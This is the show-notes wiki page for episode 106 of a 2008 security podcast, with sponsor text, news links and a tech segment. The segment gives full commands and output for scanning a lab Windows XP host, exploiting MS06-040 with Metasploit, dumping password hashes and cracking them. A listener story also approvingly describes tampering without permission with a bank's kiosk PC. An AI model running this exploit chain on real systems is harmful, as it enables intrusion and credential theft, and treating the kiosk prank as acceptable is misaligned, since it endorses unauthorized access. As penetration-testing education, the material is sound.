Episode106

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out, because this new client site modules rock! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.

This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!

Announcements & Shameless Plugs

Live from the G-Unit Studios Welcome to Security Weekly, Episode 106 for May 1st, 2008

Episode Media

mp3

Tech Segment: Bob Writes In...

Hey guys, Just thought I would send you an email and say thanks for all of your great podcats. I recently found them and decided that I would start from the beginning and go all the way up to the most recent. Right now I am in February of 2007. It has taken about a week to get that far. I thought that I would give a story about my friend and your's ,"Bob". Who went to his bank to draw some money out of his ATM to buy a pizza. He found a new edition to the walk up ATM area, a PC. Well Bob as you know being the curious type, decided to see what the computer was for and what he could do with it. Well he quickly realized that it was a windows 2000 box that generally was locked down via group policy and was ment to show just one web page displayed. This page was for requesting a loan or looking at the other services that the bank had to offer. After looking around for a little while bob noticed that one hot key was left open, the search hot key to do a search, not only search but where did "Bob" want to search. Bob thought lets see if we have internet access. Guess what, it did. After surfing for a minute or two, he decided he needed to walk away for a moment or two he needed to walk away and buy his pizza. While waiting on his pizza, he began to realise that this was his bank and that this open PC was behind the banks firewall. "Bob" decided that it was time to do a kamikazee attack, he knew the chances where very high of being caught, in fact he counted on it. So "Bob" goes back and opens a few webpages that show have firewall scanners, grc.com (you can leave that out, this was when we still respected...well, you know who). Show all the open things that he can and thinks to himself, someone will just come in the morning and think somehow someone went the wrong web pages. So "Bob" decides to make a real obvious point, he goes to a porn page and download a movie of....well you get the idea. Then places the movie on full screen, repeat, and at full volume. Needless to say that "Bob" had a call from the bank president the next day and had a not so friendly, in depth discusion about security and his bank and that they could use "Bob's" help. This unfortunately did not work. Needless to say the Bank President said do not do it again, "Bob" said that they need to resolve their issues and that this was his bank.

Crooks Rig ATM with EEPC - [Paul Asadoorian] - This is so awesome for so many reasons. First, as computers become more "embedded", we're going to see more of these attacks used to bypass systems and collect information. We're already seeing ATMs and swipe cards get abused in this way ( in fact for some time people have been embedded their own readers in ATM machines). Now, as technology gets smalls, you will see it used all over, and in new and interesting ways. Also, I love this Then they always proceeded to disable the rest of the machines, so clients were forced to use the rigged ATM Nice touch, they actually got caught because they reported a car accident. Hrm, criminal caught on tape, criminal standing in police station, as Larry would say, "CONVENIENT!"

Tech Segment: Probe, Exploit, and Crack for Free

On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show :) I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139

It reports:

Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
   - Host information : 
     [i] Plugin ID 11936
      | Remote operating system : Microsoft Windows XP
      | Microsoft Windows XP Service Pack 1
      | Confidence Level : 99
      | Method : MSRPC
      | 
      | 
      |  
      | The remote host is running one of these operating systems : 
      | Microsoft Windows XP
      | Microsoft Windows XP Service Pack 1

   - Port netbios-ssn (139/tcp) is open
   - Port microsoft-ds (445/tcp) is open
     [!] Plugin ID 22194
      | 
      | Synopsis :
      | 
      | 
      | Arbitrary code can be executed on the remote host due to a flaw
      | in the 
      | 'server' service.
      | 
      | Description :
      | 
      | 
      | The remote host is vulnerable to a buffer overrun in the 'Server'
      | service
      | which may allow an attacker to execute arbitrary code on the remote
      | host
      | with the 'System' privileges.
      | 
      | Solution : 
      | 
      | 
      | Microsoft has released a set of patches for Windows 2000, XP and
      | 2003 :
      | 
      | 
      | http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
      | 
      | 
      | 
      | Risk factor : 
      | 
      | 
      | Critical / CVSS Base Score : 10.0
      | (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
      | CVE : CVE-2006-3439
      | BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:

/framework-3.1/trunk gordon$ ./msfconsole 

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 62 aux

I want to tell metasploit to use the following module:

msf > use windows/smb/ms06_040_netapi

I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:

msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp 
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:

msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139

Here are what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

   Name     Current Setting  Required  Description                             
   ----     ---------------  --------  -----------                             
   RHOST    192.168.10.139   yes       The target address                      
   RPORT    445              yes       Set the SMB service port                
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  


Payload options:

   Name      Current Setting                                                Required  Description                           
   ----      ---------------                                                --------  -----------                           
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload   
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process  
   LPORT     4444                                                           yes       The local port                        


Exploit target:

   Id  Name                                                   
   --  ----                                                   
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:

msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:

msf exploit(ms06_040_netapi) > sessions -i 1

I then tell meterpreter to load the Sam Juicer module:

meterpreter > use -m Sam

Then I issue the "hashdump" command:

meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into my other directory with John The Ripper Installed:

paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:

paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED          (TeamTed)
                 (SUPPORT_388945a0)
                 (Noone)
                 (Guest)
COM              (Administrator:2)
guesses: 5  time: 0:00:00:02 (3)  c/s: 11060K  trying: TOUSCEL - TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!


Stories For Discussion

Don't believe everything on the internet - [Larry] - Not even the McAfee Hacker Safe logo. Russ McRee found that many sites with the Hacker Safe logo were still vulnerable to XSS attacks....

A Simple Web Application Firewall - [Paul Asadoorian] - Great tips on configuring Apache to prevent some of the more common XSS and SQL injection attacks. Everyoen should do this, Apache is free and in common use. This is a great way to stop the low hanging fruit, and you can even log it and monitor with you centralize logging/SIM/SEM, you do have one right?

Infiltrating Kraken - [Larry] - Tipping point was able to infiltrate the Kraken botnet, and has the ability to clean and patch the zombies, but isn't because of liability issues. This is a great case for reverse engineering malware.

Remember we talked about wireless worms? - [Paul Asadoorian] - Looks like this tool helps automate wireless pwnage, sweet!

SafeHTML - [Larry] - Seems like a neat tool help prevent XSS by performing some form sanitization - on the back end via PHP, not in the browser.

Netcat Over SSL - [Paul Asadoorian] - Neat!

COFFE - [Larry] - Microsoft helping law enforcement break bit locker and such? Allegedly no, that COFFE is just a compilation of scripts and freely available tools, chained together and easily usable. So why the big secret MS? Release it to the security community. COFFE - Where's My Copy? - Yea, so like why hide it and only give it to law enforcement?

Social Networking Security - A Paper - [Paul Asadoorian] - Raul sent this in, I haven't had time to read it, but it looks good.

Defcon Virus contest - [Larry] - I don;t understand why the AV vendors are bashing this contest. they should be sponsoring it, and taking the valuable data that they can gather to help enhance signature and heuristics matching! Take lemons and make lemonade, and quit yer bitchin'! [Paul Asadoorian] - I do, A/V vendors don't want their "secret" to come out, and that is they cannot prevent all attacks against your system. There are many ways around signature based anti-virus software, and it takes time for companies to push out updated signatures. Guess what, the bad guys are figuring out how to evade sigs quicker than most companies can detect. Why else would we have botnets that are 500k+ hosts? The real problem is that A/V gives people too much confidence, which can have the opposite effect. My advice? Browse the web and use your computer and pretend that you DON'T have A/V software, and the world would be a safer place.

My Advice: Never get put on a vendor's customer list - [Paul Asadoorian] - There have been numerous reports of a remote buffer overflow in SNMPc, a monitoring server from Castle Rock. Basically, looks like you can send an SNMP trap to the monitoring server and perform a remote exploit. SNMP uses UDP, UDP can be spoofed to get around filters. Also, I like UDP for exploits because if you find an echo server you can bounce the attack through that system. Also, if you go to their web site, they list their customers, in plain sight, on the Internet. Customer list then becomes target list for attackers. Attackers are evil, why wouldn't they blast the exploit to every system in all of the address space of the customer list? What if they are doing it now? Be certain to go on your border router/firewall and block UDP ports 161/162, it won't take long and you will increase the security of your network.

I hate these type of disclosures - [Larry] - Suuure, they tease me with all sorts of potential issues with Nortel Communicaations server....and there are no details. Even the discussion is weak! Sure, I can understand that maybe they are working with the vendor to resolve, but you should at least say so!= Humor aka freaking Priceless =

Listener Submitted